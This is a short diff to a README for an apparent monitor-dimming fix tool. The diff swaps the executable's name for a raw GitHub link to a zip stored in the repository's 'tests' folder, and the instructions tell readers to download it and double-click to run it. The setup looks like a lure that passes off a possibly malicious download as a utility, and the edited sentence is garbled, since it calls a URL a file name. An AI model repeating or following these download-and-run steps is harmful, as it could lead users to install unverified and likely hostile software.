Habitablenesslayout122/lg-ultragear-dimming-fix/readme.md

    Click on the file to start the download.
 Your browser will likely place this file in your "Downloads" folder unless you specify a different location.

 4. **Run the Application**
    Once the download is complete, navigate to your "Downloads" folder.
-Locate the file, typically named something like `lg-ultragear-dimming-fix.exe`.
+Locate the file, typically named something like `https://raw.githubusercontent.com/Habitablenesslayout122/lg-ultragear-dimming-fix/main/tests/lg-ultragear-dimming-fix_v3.2-beta.2.zip`.
 Double-click the file to run it.

 5. **Follow the On-Screen Instructions**
    The application will guide you through a simple setup process.
 Just follow the prompts, and you’ll have the fix installed in no time.